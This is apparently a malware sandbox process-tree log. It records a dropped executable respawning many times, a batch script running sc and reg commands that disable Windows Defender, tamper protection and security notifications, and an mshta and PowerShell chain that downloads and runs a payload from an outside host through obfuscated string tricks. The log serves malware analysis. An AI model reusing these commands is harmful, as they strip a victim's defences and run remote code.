C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9688
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7752
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7564
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8280
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 284⤵
- Program crash
PID:7052
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7236
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2384
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6984
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5964
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10288
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10552
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10884
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6000
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10800
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11052
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11360
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11972
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6100
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11880
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12664
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13100
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8276
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13364
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13892
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14332
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13444
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13656 -s 284⤵
- Program crash
PID:14880
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11820
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14596 -s 284⤵
- Program crash
PID:10052
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:15080
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13868
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14584
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14364
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12620
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4768
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12484
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14692
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:16048
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11560
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6116
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9356
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12364
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12332
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14684
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9664
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14360
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4292
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4232
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:15268
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3576
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:15648
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:16512
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12348
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17044
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17024
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:15572
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9928
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13796
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12712
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17020
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17948
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:18080
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:18268
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:18200
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:18244
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17784
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11204
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8728
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12580
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:16444
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9196
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13704
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13028 -s 1644⤵
- Program crash
PID:9936
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14904
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12316 -s 284⤵
- Program crash
PID:11864
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17248
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10504
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4820
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12040
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14368
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:16028
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17132
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:772
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2232
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6476
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12684
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:3372
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:16872
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:9568
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13572
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12336
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:2796
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:18408
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6856
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13996
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12380
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 284⤵
- Program crash
PID:9840
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6592
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:15400
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:16088
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17516
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:10820
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:14372
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:11948
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:5644
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:15188
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:4680
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6524
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13100
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:7832
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8160
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17264
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:12516
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:18212
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:13356
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:8772
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:6028
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵PID:17544
-
-
-
C:\Users\Admin\Documents\LaGOi5FqrajxvOhiyDFqs9Zw.exe"C:\Users\Admin\Documents\LaGOi5FqrajxvOhiyDFqs9Zw.exe"2⤵
- Executes dropped EXE
PID:4696 -
C:\Users\Admin\AppData\Local\Temp\iopttXZB.com"C:\Users\Admin\AppData\Local\Temp\iopttXZB.com"3⤵PID:5128
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8C14.tmp\8C15.tmp\8C16.bat C:\Users\Admin\AppData\Local\Temp\iopttXZB.com"4⤵PID:5756
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵PID:6020
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start=disabled5⤵PID:5248
-
-
C:\Windows\system32\sc.exesc config Sense start=disabled5⤵PID:3440
-
-
C:\Windows\system32\sc.exesc config WdNisDrv start=disabled5⤵PID:5604
-
-
C:\Windows\system32\sc.exesc config WdNisSvc start=disabled5⤵PID:5704
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:5256
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:6372
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:584
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:6356
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f5⤵PID:5412
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f5⤵PID:6392
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f5⤵PID:4548
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵PID:3280
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵PID:4056
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵PID:1004
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵PID:3124
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵PID:4544
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵PID:6968
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f5⤵PID:6392
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f5⤵PID:4640
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:6736
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"5⤵PID:5712
-
C:\Windows\system32\find.exefind /i "SecHealthUI"6⤵PID:5264
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"6⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2900
-
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵PID:7576
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f5⤵PID:3304
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageState\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_8wekyb3d8bbwe" /f5⤵PID:4348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility5⤵PID:6012
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility6⤵PID:1228
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f5⤵PID:3556
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:7928
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f5⤵PID:2452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FtjUdUdy.com"C:\Users\Admin\AppData\Local\Temp\FtjUdUdy.com"3⤵PID:5296
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt4⤵
- Blocklisted process makes network request
PID:3384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X5⤵
- Blocklisted process makes network request
PID:1636 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd6⤵PID:8652
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1636 -s 16926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2808
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XCpA6wq6.com"C:\Users\Admin\AppData\Local\Temp\XCpA6wq6.com"3⤵
